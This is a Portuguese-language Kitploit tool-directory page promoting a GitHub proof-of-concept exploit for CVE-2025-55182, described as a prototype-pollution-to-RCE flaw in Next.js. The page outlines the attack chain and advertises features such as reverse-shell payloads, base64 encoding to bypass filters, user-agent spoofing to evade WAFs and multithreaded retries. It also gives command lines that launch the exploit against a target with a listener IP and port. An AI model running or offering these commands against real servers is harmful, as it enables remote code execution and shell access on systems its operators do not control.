Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — Poc for CVE-2025-55182 | Kitploit
Ferramentas/GitHubGitHub/0xn7y/cve-2025-55182
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHub0xn7y/cve-2025-55182

CVE-2025-55182

Poc for CVE-2025-55182

Ver Repositório
há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 Poluição de Protótipo no Next.js

CVE-2025-55182 é uma vulnerabilidade crítica de poluição de protótipo no nextjs que permite RCE através de sanitização inadequada de entrada no mecanismo de manipulação de requisições do framework. Tudo isso acontece porque o nextjs confia em objetos JSON como um novato inexperiente.

PoC

root@kitploit:~
1) Poluição de Protótipo no Parsing de Requisições: o nextjs sanitiza incorretamente objetos que podem poluir a cadeia de protótipos.

2) Desserialização Insegura: o framework permite que objetos JSON modifiquem protótipos de objeto base.

3) RCE via child_process: ao poluir a cadeia de protótipos, uma vez poluída, podemos sequestrar a lógica e fazer o servidor executar comandos.

Configuração

root@kitploit:~
npm create [email protected] vuln

Capacidades Principais do Exploit

root@kitploit:~
1) Payloads de Reverse Shell: shells reversos Linux/Win
2) Codificação Base64 para burlar filtros
3) Detecção automática de SO
4) User agents aleatórios para evitar WAFs
5) Loops de repetição em caso de falha para tentativas com backoff exponencial
6) Multithreading para tentativas de exploração concorrentes para confiabilidade

Com codificação Base64 (evasão)

root@kitploit:~
python exp_v2.py target 192.168.1.69 9001 --base64

Modo agressivo com repetições

root@kitploit:~
python exploit.py target 192.168.1.69 9001 --retries 5 --threads 3

Desabilitar user agent aleatório

root@kitploit:~
python exploit.py target.com 192.168.1.69 9001 --no-spoof
Baixar ferramenta